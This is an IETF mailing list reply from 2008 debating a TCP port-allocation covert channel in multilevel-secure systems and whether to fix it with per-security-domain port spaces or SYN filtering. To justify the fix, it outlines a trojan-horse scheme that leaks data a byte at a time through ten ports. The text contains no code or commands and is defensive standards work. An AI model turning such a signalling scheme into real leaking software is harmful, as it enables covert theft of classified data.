At 07:01 PM 10/2/2008, Joe Touch wrote:
-----BEGIN PGP SIGNED MESSAGE-----
A second single level process at SECRET also attempts to do a passive
open to the same port - but gets blocked because the port resource is
being held by the TOP SECRET process. The SECRET process now has one bit
of information about the TOP SECRET part of the host. By grabbing and
releasing port resources, the TS process can signal data to processes at
lower security levels.
Understood. However, the lower security process can't know whether it's
the TS process doing this or some other reason (port blocked, e.g.); all
it knows is that it can't connect at the level it wants on
the port it wants.
MLS systems have a couple of mandatory access rules - one of them is that
processes at higher levels can read things at lower levels (assuming the
discretionary access controls permit it). This includes specifically, programs.
Say you have an attacker - a contract programmer hired by Coke to write a
couple of utility programs. He writes two - one program that almost everyone
will use at some point, another for his own personal use. The former includes
the signaling code to twiddle TCP ports. The latter contains the code to
monitor that twiddling. The attacker completes his program, checks it in for
use. Mr VP comes along, logs in at TOP SECRET and runs the utility program -
maybe its a spell checker - and triggers the signaling process. The utility
program has access to everything Mr VP has at that level. One of the things the
trojan horse finds is the formula for New Coke (tm).. :-) The attacker (at the
UNCLASSIFIED level) captures the signals and ultimately the formula and sells
the formula to the highest bidder.
The signaling program uses 10 ports - two to signal the presences or absence of
data - and 8 others to represent one byte of data. (See the old 1822 protocol
definitions).
...
The fix was to virtualize TCP so that there was a complete set of TCP
ports per distinct security domain.
I agree that this fixes your problem, but what it does is create a new
naming dimension to the entire Internet, and I don't think that this is
feasible.
Naming? Not really. Addressing maybe - but that's - as I said before - pretty
local to only those hosts that implement MLS.
Perhaps you'd prefer to black-hole the SYNs at the wrong security level,
which would still modify 793, but would not create the naming dimension
problem that concerns me...
Define "wrong security level" - both the attacker and victim are operating at
their own security levels, its just the resource interactions that lead to the
covert channel.
Which SYN's - (need an exact filter definition here please) would you black
hole, and how would that solve anything?
_______________________________________________
Ietf mailing list
Ietf(_at_)ietf(_dot_)org
https://www.ietf.org/mailman/listinfo/ietf